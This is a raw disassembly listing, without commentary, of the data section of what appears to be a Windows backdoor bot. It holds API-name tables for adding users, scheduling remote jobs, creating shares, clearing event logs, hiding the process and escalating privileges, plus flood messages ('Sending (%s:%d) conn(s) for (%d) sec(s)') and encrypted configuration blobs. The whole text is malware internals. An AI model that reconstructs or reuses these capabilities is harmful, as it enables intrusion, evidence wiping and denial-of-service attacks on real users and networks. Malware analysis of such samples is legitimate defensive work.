aWnetaddconnect db 'WNetAddConnection2A',0 ; DATA XREF: sub_417362+D17�o
aMpr_dll db 'mpr.dll',0 ; DATA XREF: sub_417362:loc_41806C�o
aGetnetworkpara db 'GetNetworkParams',0 ; DATA XREF: sub_417362:loc_418044�o
align 4
aGetudptable db 'GetUdpTable',0 ; DATA XREF: sub_417362+CA2�o
aGettcptable db 'GetTcpTable',0 ; DATA XREF: sub_417362+C95�o
aGetiftable db 'GetIfTable',0 ; DATA XREF: sub_417362+C88�o
align 4
aDeleteipnetent db 'DeleteIpNetEntry',0 ; DATA XREF: sub_417362+C7B�o
align 10h
aGetipnettable db 'GetIpNetTable',0 ; DATA XREF: sub_417362+C73�o
align 10h
aIphlpapi_dll db 'iphlpapi.dll',0 ; DATA XREF: sub_417362:loc_417FC4�o
align 10h
aDnsflushreso_0 db 'DnsFlushResolverCacheEntry_A',0 ; DATA XREF: sub_417362+C2D�o
align 10h
aDnsflushresolv db 'DnsFlushResolverCache',0 ; DATA XREF: sub_417362+C25�o
align 4
aDnsapi_dll db 'dnsapi.dll',0 ; DATA XREF: sub_417362:loc_417F7A�o
align 4
aNetmessagebuff db 'NetMessageBufferSend',0 ; DATA XREF: sub_417362+B9B�o
align 4
aNetusergetinfo db 'NetUserGetInfo',0 ; DATA XREF: sub_417362+B8E�o
align 4
aNetuserenum db 'NetUserEnum',0 ; DATA XREF: sub_417362+B81�o
aNetuserdel db 'NetUserDel',0 ; DATA XREF: sub_417362+B74�o
align 4
aNetuseradd db 'NetUserAdd',0 ; DATA XREF: sub_417362+B67�o
align 10h
aNetremotetod db 'NetRemoteTOD',0 ; DATA XREF: sub_417362+B5A�o
align 10h
aNetapibufferfr db 'NetApiBufferFree',0 ; DATA XREF: sub_417362+B4D�o
align 4
aNetschedulejob db 'NetScheduleJobAdd',0 ; DATA XREF: sub_417362+B40�o
align 4
aNetshareenum db 'NetShareEnum',0 ; DATA XREF: sub_417362+B33�o
align 4
aNetsharedel db 'NetShareDel',0 ; DATA XREF: sub_417362+B26�o
aNetshareadd db 'NetShareAdd',0 ; DATA XREF: sub_417362+B1E�o
aIcmpsendecho db 'IcmpSendEcho',0 ; DATA XREF: sub_417362+AD0�o
align 10h
aIcmpclosehandl db 'IcmpCloseHandle',0 ; DATA XREF: sub_417362+AC3�o
aIcmpcreatefile db 'IcmpCreateFile',0 ; DATA XREF: sub_417362+ABB�o
align 10h
aIcmp_dll db 'icmp.dll',0 ; DATA XREF: sub_417362:loc_417E10�o
align 4
aMozilla5_0 db 'Mozilla/5.0',0 ; DATA XREF: sub_417362+A81�o
aInternetcloseh db 'InternetCloseHandle',0 ; DATA XREF: sub_417362+A0F�o
aInternetreadfi db 'InternetReadFile',0 ; DATA XREF: sub_417362+A02�o
align 10h
aInternetcracku db 'InternetCrackUrlA',0 ; DATA XREF: sub_417362+9F5�o
align 4
aInternetopenur db 'InternetOpenUrlA',0 ; DATA XREF: sub_417362+9E8�o
align 4
aInternetopena db 'InternetOpenA',0 ; DATA XREF: sub_417362+9DB�o
align 4
aInternetconnec db 'InternetConnectA',0 ; DATA XREF: sub_417362+9CE�o
align 4
aFtpputfilea db 'FtpPutFileA',0 ; DATA XREF: sub_417362+9C1�o
aFtpgetfilea db 'FtpGetFileA',0 ; DATA XREF: sub_417362+9B4�o
aHttpsendreques db 'HttpSendRequestA',0 ; DATA XREF: sub_417362+9A7�o
align 4
aHttpopenreques db 'HttpOpenRequestA',0 ; DATA XREF: sub_417362+99A�o
align 4
aInternetgetc_0 db 'InternetGetConnectedStateEx',0 ; DATA XREF: sub_417362+98D�o
aInternetgetcon db 'InternetGetConnectedState',0 ; DATA XREF: sub_417362+985�o
align 4
aWininet_dll db 'wininet.dll',0 ; DATA XREF: sub_417362:loc_417CD6�o
aShutdown db 'shutdown',0 ; DATA XREF: sub_417362+837�o
; sub_41EC9D+126�o
align 4
aClosesocket db 'closesocket',0 ; DATA XREF: sub_417362+82A�o
aGetpeername db 'getpeername',0 ; DATA XREF: sub_417362+81D�o
aGethostbyaddr db 'gethostbyaddr',0 ; DATA XREF: sub_417362+810�o
align 4
aGethostbyname db 'gethostbyname',0 ; DATA XREF: sub_417362+803�o
align 4
aGethostname db 'gethostname',0 ; DATA XREF: sub_417362+7F6�o
aGetsockname db 'getsockname',0 ; DATA XREF: sub_417362+7E9�o
aSetsockopt db 'setsockopt',0 ; DATA XREF: sub_417362+7DC�o
align 4
aAccept db 'accept',0 ; DATA XREF: sub_417362+7CF�o
align 10h
aListen db 'listen',0 ; DATA XREF: sub_417362+7C2�o
align 4
aSelect db 'select',0 ; DATA XREF: sub_417362+7B5�o
align 10h
aBind db 'bind',0 ; DATA XREF: sub_417362+7AD�o
align 4
aRecvfrom db 'recvfrom',0 ; DATA XREF: sub_417362+79B�o
align 4
aRecv db 'recv',0 ; DATA XREF: sub_417362+78E�o
align 4
aSendto db 'sendto',0 ; DATA XREF: sub_417362+781�o
align 4
aSend db 'send',0 ; DATA XREF: sub_417362+774�o
align 4
aNtohl db 'ntohl',0 ; DATA XREF: sub_417362+767�o
align 4
aNtohs db 'ntohs',0 ; DATA XREF: sub_417362+75A�o
align 4
aHtonl db 'htonl',0 ; DATA XREF: sub_417362+74D�o
align 4
aHtons db 'htons',0 ; DATA XREF: sub_417362+740�o
align 4
aInet_addr db 'inet_addr',0 ; DATA XREF: sub_417362+733�o
align 4
aInet_ntoa db 'inet_ntoa',0 ; DATA XREF: sub_417362+726�o
align 4
aConnect db 'connect',0 ; DATA XREF: sub_417362+719�o
aIoctlsocket db 'ioctlsocket',0 ; DATA XREF: sub_417362+70C�o
aSocket db 'socket',0 ; DATA XREF: sub_417362+6FF�o
align 10h
aWsacleanup db 'WSACleanup',0 ; DATA XREF: sub_417362+6F2�o
align 4
aWsagetlasterro db 'WSAGetLastError',0 ; DATA XREF: sub_417362+6E5�o
aWsaioctl db 'WSAIoctl',0 ; DATA XREF: sub_417362+6D8�o
align 4
a__wsafdisset db '__WSAFDIsSet',0 ; DATA XREF: sub_417362+6CB�o
align 4
aWsaasyncselect db 'WSAAsyncSelect',0 ; DATA XREF: sub_417362+6BE�o
align 4
aWsasocketa db 'WSASocketA',0 ; DATA XREF: sub_417362+6B1�o
align 4
aWsastartup db 'WSAStartup',0 ; DATA XREF: sub_417362+6A9�o
align 10h
aWs2_32_dll db 'ws2_32.dll',0 ; DATA XREF: sub_417362+698�o
align 4
aDeleteobject db 'DeleteObject',0 ; DATA XREF: sub_417362+625�o
align 4
aDeletedc db 'DeleteDC',0 ; DATA XREF: sub_417362+618�o
align 4
aBitblt db 'BitBlt',0 ; DATA XREF: sub_417362+60B�o
align 10h
aSelectobject db 'SelectObject',0 ; DATA XREF: sub_417362+5FE�o
align 10h
aGetdibcolortab db 'GetDIBColorTable',0 ; DATA XREF: sub_417362+5F1�o
align 4
aGetdevicecaps db 'GetDeviceCaps',0 ; DATA XREF: sub_417362+5E4�o
align 4
aCreatecompatib db 'CreateCompatibleDC',0 ; DATA XREF: sub_417362+5D7�o
align 4
aCreatedibsecti db 'CreateDIBSection',0 ; DATA XREF: sub_417362+5CA�o
align 4
aCreatedca db 'CreateDCA',0 ; DATA XREF: sub_417362+5C2�o
align 4
aGdi32_dll db 'gdi32.dll',0 ; DATA XREF: sub_417362:loc_417913�o
align 4
aCloseeventlog db 'CloseEventLog',0 ; DATA XREF: sub_417362+574�o
align 4
aOpeneventloga db 'OpenEventLogA',0 ; DATA XREF: sub_417362+567�o
align 4
aCleareventloga db 'ClearEventLogA',0 ; DATA XREF: sub_417362:loc_4178C1�o
align 4
aGetusernamea db 'GetUserNameA',0 ; DATA XREF: sub_417362:loc_4178A6�o
align 4
aSetservicestat db 'SetServiceStatus',0 ; DATA XREF: sub_417362+4B4�o
align 4
aRegisterserv_0 db 'RegisterServiceCtrlHandlerA',0 ; DATA XREF: sub_417362+4A7�o
aUnlockserviced db 'UnlockServiceDatabase',0 ; DATA XREF: sub_417362+49A�o
align 4
aChangeservicec db 'ChangeServiceConfig2A',0 ; DATA XREF: sub_417362+48D�o
align 4
aQueryservicelo db 'QueryServiceLockStatusA',0 ; DATA XREF: sub_417362+480�o
aLockservicedat db 'LockServiceDatabase',0 ; DATA XREF: sub_417362+473�o
aImpersonatelog db 'ImpersonateLoggedOnUser',0 ; DATA XREF: sub_417362+466�o
aStartservicect db 'StartServiceCtrlDispatcherA',0 ; DATA XREF: sub_417362+459�o
aCreateservicea db 'CreateServiceA',0 ; DATA XREF: sub_417362+44C�o
align 4
aIsvalidsecurit db 'IsValidSecurityDescriptor',0 ; DATA XREF: sub_417362+43F�o
align 10h
aEnumservicesst db 'EnumServicesStatusA',0 ; DATA XREF: sub_417362+432�o
aCloseserviceha db 'CloseServiceHandle',0 ; DATA XREF: sub_417362+425�o
align 4
aDeleteservice db 'DeleteService',0 ; DATA XREF: sub_417362+418�o
align 4
aControlservice db 'ControlService',0 ; DATA XREF: sub_417362+40B�o
align 4
aStartservicea db 'StartServiceA',0 ; DATA XREF: sub_417362+3FE�o
align 4
aOpenservicea db 'OpenServiceA',0 ; DATA XREF: sub_417362+3F1�o
align 4
aOpenscmanagera db 'OpenSCManagerA',0 ; DATA XREF: sub_417362:loc_41774B�o
align 4
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_417362+3B1�o
align 10h
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_417362+3A4�o
align 4
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_417362+397�o
align 4
aOpenthreadtoke db 'OpenThreadToken',0 ; DATA XREF: sub_417362:loc_4176F1�o
aRegqueryinfoke db 'RegQueryInfoKeyA',0 ; DATA XREF: sub_417362+32F�o
align 10h
aRegenumvaluea db 'RegEnumValueA',0 ; DATA XREF: sub_417362+322�o
align 10h
aRegenumkeyexa db 'RegEnumKeyExA',0 ; DATA XREF: sub_417362+315�o
align 10h
aRegclosekey db 'RegCloseKey',0 ; DATA XREF: sub_417362+308�o
aRegdeletekeya db 'RegDeleteKeyA',0 ; DATA XREF: sub_417362+2FB�o
align 4
aRegdeletevalue db 'RegDeleteValueA',0 ; DATA XREF: sub_417362+2EE�o
aRegqueryvaluee db 'RegQueryValueExA',0 ; DATA XREF: sub_417362+2E1�o
align 10h
aRegsetvalueexa db 'RegSetValueExA',0 ; DATA XREF: sub_417362+2D4�o
align 10h
aRegcreatekeyex db 'RegCreateKeyExA',0 ; DATA XREF: sub_417362+2C7�o
aRegopenkeyexa db 'RegOpenKeyExA',0 ; DATA XREF: sub_417362+2BF�o
align 10h
aAdvapi32_dll db 'advapi32.dll',0 ; DATA XREF: sub_417362:loc_41760C�o
align 10h
aGetclassnamea db 'GetClassNameA',0 ; DATA XREF: sub_417362+255�o
align 10h
aIswindowvisibl db 'IsWindowVisible',0 ; DATA XREF: sub_417362+248�o
aShowwindow db 'ShowWindow',0 ; DATA XREF: sub_417362+23B�o
align 4
aGetwindowthrea db 'GetWindowThreadProcessId',0 ; DATA XREF: sub_417362+22E�o
align 4
aGetwindowinfo db 'GetWindowInfo',0 ; DATA XREF: sub_417362+221�o
align 4
aEnumwindows db 'EnumWindows',0 ; DATA XREF: sub_417362:loc_41757B�o
aExitwindowsex db 'ExitWindowsEx',0 ; DATA XREF: sub_417362+1B9�o
align 4
aCloseclipboard db 'CloseClipboard',0 ; DATA XREF: sub_417362+1AC�o
align 4
aGetclipboardda db 'GetClipboardData',0 ; DATA XREF: sub_417362+19F�o
align 4
aOpenclipboard db 'OpenClipboard',0 ; DATA XREF: sub_417362+192�o
align 4
aDestroywindow db 'DestroyWindow',0 ; DATA XREF: sub_417362+185�o
align 4
aIswindow db 'IsWindow',0 ; DATA XREF: sub_417362+178�o
align 4
aFindwindowa db 'FindWindowA',0 ; DATA XREF: sub_417362+16B�o
aSendmessagea db 'SendMessageA',0 ; DATA XREF: sub_417362+15E�o
align 10h
aClosewindow db 'CloseWindow',0 ; DATA XREF: sub_417362+156�o
aUser32_dll db 'user32.dll',0 ; DATA XREF: sub_417362:loc_4174A3�o
; sub_418E0F+2F�o ...
align 4
aRegisterservic db 'RegisterServiceProcess',0 ; DATA XREF: sub_417362:loc_41747F�o
align 10h
aGetcomputernam db 'GetComputerNameA',0 ; DATA XREF: sub_417362+AD�o
align 4
aQueryperform_0 db 'QueryPerformanceFrequency',0 ; DATA XREF: sub_417362+A0�o
align 10h
aQueryperforman db 'QueryPerformanceCounter',0 ; DATA XREF: sub_417362+93�o
aSearchpatha db 'SearchPathA',0 ; DATA XREF: sub_417362+86�o
aGetdrivetypea db 'GetDriveTypeA',0 ; DATA XREF: sub_417362+79�o
align 4
aGetlogicaldriv db 'GetLogicalDriveStringsA',0 ; DATA XREF: sub_417362+6C�o
aGetdiskfreespa db 'GetDiskFreeSpaceExA',0 ; DATA XREF: sub_417362+5F�o
aModule32first db 'Module32First',0 ; DATA XREF: sub_417362+52�o
align 10h
aProcess32next db 'Process32Next',0 ; DATA XREF: sub_417362+45�o
align 10h
aProcess32first db 'Process32First',0 ; DATA XREF: sub_417362+38�o
align 10h
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0 ; DATA XREF: sub_417362+2B�o
align 4
aSeterrormode db 'SetErrorMode',0 ; DATA XREF: sub_417362+23�o
align 4
aKernel32_dll_1 db 'kernel32.dll',0 ; DATA XREF: sub_417362+A�o
align 4
aSSSSExecutingF db '%s %s %s: %s executing file: %s.',0 ; DATA XREF: sub_4182BA+695�o
align 10h
aSProcessSSTota db '%s Process %s: "%s", Total %s Time: %s.',0 ; DATA XREF: sub_4182BA+55E�o
a_2d_2d db ' %.2d:%.2d',0 ; DATA XREF: sub_4182BA+53A�o
; sub_41F533+2BA�o
align 4
aDS db ' %d%s',0 ; DATA XREF: sub_4182BA+50F�o
; sub_41F533+292�o
align 4
aHours db ' hours',0 ; DATA XREF: sub_4182BA+502�o
; sub_41F533+285�o
align 4
aHour db ' hour',0 ; DATA XREF: sub_4182BA+4FB�o
; sub_41F533+27E�o
align 4
aSCreatedProces db '%s Created process: "%s", PID: <%d>',0 ; DATA XREF: sub_4182BA+470�o
; sub_4182BA+497�o
aSSToCreateProc db '%s %s to create process: "%s", %s: <%d>',0 ; DATA XREF: sub_4182BA+404�o
; sub_4182BA+435�o
aSCouldnTParseP db '%s Couldn',27h,'t parse path, %s: <%d>',0 ; DATA XREF: sub_4182BA+32D�o
; sub_4182BA+356�o
align 4
aSSS_1fkbToS@_1 db '%s %s %s: %.1fKB to: %s @ %.1fKB/sec.',0 ; DATA XREF: sub_4182BA+252�o
; sub_4182BA+2BA�o
align 4
aSCouldnTOpenFi db '%s Couldn',27h,'t open file for writing: %s.',0
; DATA XREF: sub_4182BA+AC�o
align 4
aSErrorOutOfMem db '%s Error: Out Of Mem!',0 ; DATA XREF: sub_418AD3+1B9�o
align 4
aSSSDSentDConnS db '%s %s (%s:%d) Sent: (%d) conn(s) for (%d) sec(s)',0
; DATA XREF: sub_418AD3+12B�o
align 4
aSSendingSDDC_0 db '%s -> Sending (%s:%d) (%d) conn(s) for (%d) sec(s)',0
; DATA XREF: sub_418AD3+A0�o
align 4
aSSendingSDDCon db '%s -> Sending (%s:%d) (%d) connects(s) for (%d) sec(s)',0
; DATA XREF: sub_418AD3+73�o
align 8
aGx000032 db 'gx000032',0 ; DATA XREF: sub_418FA1+C�o
align 4
a3c9 db ']&3c9',0 ; DATA XREF: sub_40A9FE+57C6�o
; sub_40A9FE+895D�o ...
word_44399A dw 1F99h ; DATA XREF: sub_4020BA:loc_402118�r
; sub_406C69:loc_406CB8�r ...
word_44399C dw 1704h ; DATA XREF: sub_40A9FE:loc_40C186�r
word_44399E dw 46Ah ; DATA XREF: .text:004018D8�r
; sub_403B9B+121�r ...
byte_4439A0 db 26h ; DATA XREF: sub_40A935+2F�r
; sub_40A935+83�r ...
align 4
dword_4439A4 dd 14h ; sub_42245D+3C�r
dword_4439A8 dd 2477664Fh, 6AA83178h, 0C07559h ; sub_406C69+79�o ...
dword_4439B4 dd 12727B5Bh, 0 ; sub_401B6E+132�o ...
dword_4439BC dd 6333265Dh, 74C67A39h, 0D953C12h, 0C6h ; sub_40A9FE+89B2�o ...
dword_4439CC dd 296E616Dh, 64842364h, 57D66274h, 80F161D3h, 94724350h
; DATA XREF: sub_4051EF+114�o
; sub_416596+29F�o ...
dd 228F8170h, 0
dword_4439E8 dd 296E616Dh, 64842364h, 57D66274h, 80F161D3h, 94724350h
; DATA XREF: sub_416596+2B7�o
; sub_4221E4+59�o
dd 228F8170h, 2 dup(0)
; ---------------------------------------------------------------------------
loc_443A08: ; DATA XREF: sub_416596+2D1�o
; sub_4221E4:loc_422278�o
jg short loc_443A70
popa
das
xor [si+6B64h], eax
db 64h
retf
; ---------------------------------------------------------------------------
db 47h
db 0CFh, 36h, 0C1h
; ---------------------------------------------------------------------------
locret_443A17: ; CODE XREF: .text:00443A6E�j
iret
; ---------------------------------------------------------------------------
dd 8F735876h, 3E85AE3Ch, 0BF819E04h, 6B45316Ch, 0E0012D37h
dd 40C62470h, 0DB3F5643h, 0CEBDA35Eh, 0D0C83555h, 8B38914h
dd 60318907h, 58EEE403h, 571696B2h, 8CDC5413h, 2 dup(0)
dword_443A58 dd 80000002h ; sub_427DAA+36�r
dword_443A5C dd 19464769h, 1A5155Ch, 4AE85160h ; sub_42245D+B3�o ...
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
loc_443A69: ; CODE XREF: .text:00443A88�j
xor ebx, ebp
pushf
push ecx
push ecx
jz short locret_443A17
loc_443A70: ; CODE XREF: .text:loc_443A08�j
inc eax
mov edx, 83143E83h
cdq
mov al, ds:3E74085Ch
push ss
cmp dl, [esi]
clc
insd
adc esi, eax
sbb al, 10h
imul edi, [eax], -24h
jno short loc_443A69
pushf
fimul word ptr [ecx+0]
; ---------------------------------------------------------------------------
dw 0
dd 32h dup(0)
db 3 dup(0)
byte_443B5B db 6Dh ; DATA XREF: sub_416596+287�o
; sub_42245D+AB�o ...
dd 64296E61h, 74648423h, 8057D662h, 4A81DD02h, 70976F45h
dd 9888h, 0BDh dup(0)
dword_443E68 dd 2B666B0Ch, 7CC0603Bh, 12C33909h, 0DDD12099h, 0C935565Fh
; DATA XREF: sub_416596+38�o
; sub_42045F+229�o
dd 65898C7Dh, 0E0888E41h, 2A033261h, 0
dword_443E8C dd 7B376C5Fh, 7C94376Ah, 129C390Fh, 0D9822396h, 0CA64010Fh
; DATA XREF: sub_40A9FE+A47�o
; sub_416596+50�o
dd 64DFD57Dh, 0E388DA13h, 7A533061h, 0
dword_443EB0 dd 7C333A1Bh, 76C67739h, 1B95340Fh, 0DF817391h, 0C9310F07h
; DATA XREF: sub_41567F+1�o
; sub_416596+68�o ...
dd 61D9DD25h, 8DB0CA42h, 621F6126h, 0A4477B24h, 5BC9073Ah
dd 0D863310Bh, 9EFDB718h, 90946704h, 5DE38C55h, 217AC45Ch
dd 4FB3AC05h, 1E4ED4E9h, 88816F5Bh, 293525C0h, 7F7749h
off_443F00 dd offset dword_445D5C ; DATA XREF: sub_42045F+1D1�r
dd offset dword_445D54
dd offset dword_445D4C
dd offset dword_445D40
dd offset dword_445D34
dword_443F14 dd 6D6519h ; sub_40A9FE+7C8�o ...
off_443F18 dd offset loc_415B66+2 ; DATA XREF: sub_416596+C1�o
; sub_420AB8+52�o ...
dword_443F1C dd 356D6519h, 0 ; sub_40A9FE+1D3F�o ...
dword_443F24 dd 3E6D6519h, 0 ; sub_416596+121�o ...
dword_443F2C dd 266D6519h, 0 ; sub_40A9FE:loc_40BCF2�o ...
dword_443F34 dd 3E6D6519h, 2 dup(0) ; sub_42045F:loc_4205C8�o ...
dword_443F40 dd 7D317059h ; sub_418FA1+607�r
dd 6A993566h, 47C0684Bh, 8C9C32CEh, 5A51h, 22h dup(0)
db 3 dup(0)
byte_443FDF db 49h ; DATA XREF: sub_416596+170�o
; sub_418FA1+5DA�o
dd 6E3F636Dh, 4F258720h, 7Eh, 0
dword_443FF0 dd 0CE9h ; sub_40A9FE+4FF�o ...
dword_443FF4 dd 0 dd 7C30705Ch, 77C6603Bh, 5ACD7A12h, 9DDD6FE9h, 59h, 22h dup(0)
dd 49000000h, 6E3F636Dh, 4F258720h, 7Eh, 0
; ---------------------------------------------------------------------------
jmp loc_4440B9
; ---------------------------------------------------------------------------
align 10h
pop ebp
jno short near ptr byte_444121
and ah, [esi+35h]
cdq
push 4Bh
loc_4440B9: ; CODE XREF: .text:004440A8�j
push 32CE47C0h
pushf
mov word ptr [ecx+5Ah], ss
; ---------------------------------------------------------------------------
dw 0
dd 17h dup(0)
db 0
byte_444121 db 3 dup(0) ; CODE XREF: .text:004440B1�j
dd 0Ah dup(0)
dd 49000000h, 6E3F636Dh, 4F258720h, 7Eh, 0
; ---------------------------------------------------------------------------
jmp loc_444171
; ---------------------------------------------------------------------------
align 4
pop ebp
xor es:26D96439h, dh
push ebp
loc_444171: ; CODE XREF: .text:00444160�j
ja short $+2
; ---------------------------------------------------------------------------
db 0
dd 24h dup(0)
dd 49000000h, 6E3F636Dh, 4F258720h, 7Eh, 0
; ---------------------------------------------------------------------------
jmp loc_444229
; ---------------------------------------------------------------------------
align 10h
dd 7D313859h, 27D96573h
; ---------------------------------------------------------------------------
push ebx
loc_444229: ; CODE XREF: .text:00444218�j
and eax, esi
inc eax
; ---------------------------------------------------------------------------
dd 24h dup(0)
dd 49000000h, 6E3F636Dh, 4F258720h, 7Eh, 0
; ---------------------------------------------------------------------------
jmp loc_4442E1
; ---------------------------------------------------------------------------
align 4
dd 206D6759h, 27D9266Ch
; ---------------------------------------------------------------------------
push ebx
loc_4442E1: ; CODE XREF: .text:004442D0�j
and eax, esi
inc eax
; ---------------------------------------------------------------------------
dd 24h dup(0)
dd 49000000h, 6E3F636Dh, 4F258720h, 7Eh, 0
; ---------------------------------------------------------------------------
jmp loc_444399
; ---------------------------------------------------------------------------
align 10h
dd 286C6D4Eh, 2A983C7Bh
; ---------------------------------------------------------------------------
pop ecx
loc_444399: ; CODE XREF: .text:00444388�j
and eax, ecx
inc edi
mov fs, word ptr [ebx]
ficomp word ptr [edx-6A96A4A5h]
jns short near ptr dword_4442E4+85h
mov large ds:0, dh
; ---------------------------------------------------------------------------
dd 20h dup(0)
dd 49000000h, 6E3F636Dh, 4F258720h, 7Eh, 0
; ---------------------------------------------------------------------------
jmp loc_444451
; ---------------------------------------------------------------------------
align 4
dd 236F604Ah, 369E236Eh
; ---------------------------------------------------------------------------
pop ecx
loc_444451: ; CODE XREF: .text:00444440�j
and eax, ecx
inc edi
mov fs, word ptr [ebx]
ficomp word ptr [edx-6A96A4A5h]
jns short near ptr dword_4443AC+75h
mov large ds:0, dh
; ---------------------------------------------------------------------------
dd 20h dup(0)
dd 49000000h, 6E3F636Dh, 4F258720h, 7Eh, 0
; ---------------------------------------------------------------------------
jmp loc_444509
; ---------------------------------------------------------------------------
align 10h
dd 236F604Ah, 2398386Eh
; ---------------------------------------------------------------------------
push ebp
loc_444509: ; CODE XREF: .text:004444F8�j
arpl [ebx-2F903BB9h], cx
or dword ptr [ebx+52h], 6Ch
xchg eax, edx
jb short near ptr dword_444464+3Ah
les esi, [edx]
adc eax, 0
; ---------------------------------------------------------------------------
db 3 dup(0)
dd 1Fh dup(0)
dd 49000000h, 6E3F636Dh, 4F258720h, 7Eh, 0
; ---------------------------------------------------------------------------
jmp loc_4445C1
; ---------------------------------------------------------------------------
align 4
dd 3E6F6E4Fh, 2194357Bh
db 12h
; ---------------------------------------------------------------------------
loc_4445C1: ; CODE XREF: .text:004445B0�j
push 2FD74CD1h
rol ecx, 50h
push edx
jz short $+2
; ---------------------------------------------------------------------------
dd 22h dup(0)
dd 49000000h, 6E3F636Dh, 4F258720h, 7Eh, 0
; ---------------------------------------------------------------------------
jmp loc_444679
; ---------------------------------------------------------------------------
align 10h
dd 2B65604Eh, 29822664h
; ---------------------------------------------------------------------------
dec edi
loc_444679: ; CODE XREF: .text:00444668�j
and eax, edi
inc ecx
shr dword ptr [eax], cl
fmul qword ptr [ebx-67D1B0A5h]
jnb short near ptr dword_4445CC+3Ah
; ---------------------------------------------------------------------------
dw 0
dd 21h dup(0)
dd 49000000h, 6E3F636Dh, 4F258720h, 7Eh, 0
; ---------------------------------------------------------------------------
jmp loc_444731
; ---------------------------------------------------------------------------
align 4
dd 7D317059h, 6A993566h
; ---------------------------------------------------------------------------
dec ebx
loc_444731: ; CODE XREF: .text:00444720�j
push 32CE47C0h
pushf
mov word ptr [ecx+5Ah], ss
; ---------------------------------------------------------------------------
dw 0
dd 22h dup(0)
dd 49000000h, 6E3F636Dh, 4F258720h, 7Eh, 0
dd 0CECh, 0
dd 7C30705Ch, 77C6603Bh, 5ACD7A12h, 9DDD6FE9h, 59h, 22h dup(0)
dd 49000000h, 6E3F636Dh, 4F258720h, 7Eh, 0
dd 0CECh, 0
aQnF5sjkhG2Mqz db ']qn"f5™jKhÀGÎ2œŒQZ',0
align 4
dd 22h dup(0)
dd 49000000h, 6E3F636Dh, 4F258720h, 7Eh, 0
dd 0CECh, 0
dd 3530265Dh, 26D96439h, 7755h, 24h dup(0)
dd 49000000h, 6E3F636Dh, 4F258720h, 7Eh, 0
dd 0CECh, 0
dd 7D313859h, 27D96573h, 40C62353h, 24h dup(0)
dd 49000000h, 6E3F636Dh, 4F258720h, 7Eh, 0
dd 0CECh, 0
dd 206D6759h, 27D9266Ch, 40C62353h, 24h dup(0)
dd 49000000h, 6E3F636Dh, 4F258720h, 7Eh, 0
dd 0CECh, 0
aNmlSYGoIxyI5 db 'Nml({<˜*Y#ÁGŽ#Þš[[i•yÈ5',0
align 4
dd 20h dup(0)
dd 49000000h, 6E3F636Dh, 4F258720h, 7Eh, 0
dd 0CECh, 0
aJONU6yGoIxyI5 db 'J`o#n#ž6Y#ÁGŽ#Þš[[i•yÈ5',0
align 4
dd 20h dup(0)
dd 49000000h, 6E3F636Dh, 4F258720h, 7Eh, 0
dd 0CECh, 0
dd 236F604Ah, 2398386Eh, 478B6355h, 83D06FC4h, 926C524Bh
dd 32C48872h, 15h, 20h dup(0)
dd 49000000h, 6E3F636Dh, 4F258720h, 7Eh, 0
dd 0CECh, 0
dd 3E6F6E4Fh, 2194357Bh, 4CD16812h, 0C1C12FD7h, 745250h
dd 22h dup(0)
dd 49000000h, 6E3F636Dh, 4F258720h, 7Eh, 0
dd 0CECh, 0
aNEDVOALO_ssa db 'N`e+d&‚)O#ÇAÓ(Ü‹[O.˜s€',0
align 10h
dd 21h dup(0)
dd 49000000h, 6E3F636Dh, 4F258720h, 7Eh, 0
dd 0CECh, 0
dword_444F10 dd 80000002h ; sub_418FA1+56�r ...
dword_444F14 dd 19464769h, 1A5155Ch, 4AE85160h, 9CDD33C3h, 0A7745151h
; DATA XREF: sub_416596+1B0�o
; sub_418E0F+149�o ...
dd 3E83BA40h, 0A0998314h, 3E74085Ch, 0F8163A16h, 1CC6116Dh
dd 0DC386B10h, 0C39DDF71h, 93CD2F42h, 0CA4D134h, 7B379407h
dd 0F54Dh, 2Fh dup(0)
db 3 dup(0)
byte_445013 db 57h ; DATA XREF: sub_416596+1C7�o
; sub_418E0F+144�o ...
dd 6522677Bh, 31h, 0C1h dup(0)
dword_445320 dd 80000002h ; sub_41BC0B+AB�r ...
dword_445324 dd 19464769h, 1A5155Ch, 4AE85160h, 9CDD33C3h, 0A7745151h
; DATA XREF: sub_416596+1DF�o
; sub_41BC0B+89�o ...
dd 3E83BA40h, 0A0998314h, 3E74085Ch, 0F8163A16h, 1CC6116Dh
dd 0DC386B10h, 0C39DDF71h, 93CD2F42h, 0CA4D134h, 7B379407h
dd 0F54Dh, 2Fh dup(0)
db 3 dup(0)
byte_445423 db 48h ; DATA XREF: sub_416596+1F7�o
; sub_41BC0B+83�o ...
dd 3D756Dh, 0C2h dup(0)
dword_445730 dd 80000002h ; sub_427BC4+89�r ...
dword_445734 dd 19464769h, 1A5155Ch, 4AE85160h, 9CDD33C3h, 0A7745151h
; DATA XREF: sub_416596+20F�o
; sub_427BC4+13�o ...
dd 3E83BA40h, 0A0998314h, 3E74085Ch, 0F8163A16h, 1CC6116Dh
dd 0DC386B10h, 0C39DDF71h, 93CD2F42h, 0CA4D134h, 7B379407h
dd 0F54Dh, 2Fh dup(0)
db 3 dup(0)
byte_445833 db 53h ; DATA XREF: sub_416596+227�o
; sub_427BC4+C�o ...
dd 66247466h, 31h, 0C1h dup(0)
dword_445B40 dd 32314B77h, 425A3046h, 2F616C70h, 0 ; sub_420D91+C�o
dword_445B50 dd 4D787073h, 2F472F72h, 30494276h, 0 ; sub_41CBC1+187�o
dword_445B60 dd 526E322Fh, 704B2E75h, 2F784E4Bh, 0 ; sub_41CBC1+1A5�o
a7lybp1gunfm0 db '7LybP1GuNfm0',0 ; DATA XREF: sub_41567F+27�o
; sub_41C8B1+184�o
align 10h
a391myLxl28_ db '391mY/LxL28.',0 ; DATA XREF: sub_41567F+32�o
; sub_41C8B1+1AC�o
align 10h
a5h5br_qpSm1 db '5H5BR.qp/sm1',0 ; DATA XREF: sub_41567F+3D�o
; sub_41CBC1+82�o ...
align 10h
aYjmlc1btsf10_0 db 'yJmlc1btsF10',0 ; DATA XREF: sub_41567F+48�o
; sub_41CBC1+94�o ...
align 10h
aZyvgp1mxobt0_0 db 'zyVGp1MxObt0',0 ; DATA XREF: sub_41567F+53�o
; sub_41CBC1:loc_41CCC6�o ...
align 10h
aG7IvGks9l1_0 db 'g7/IV/gks9L1',0 ; DATA XREF: sub_41567F+61�o
; sub_41CBC1+DF�o ...
align 10h
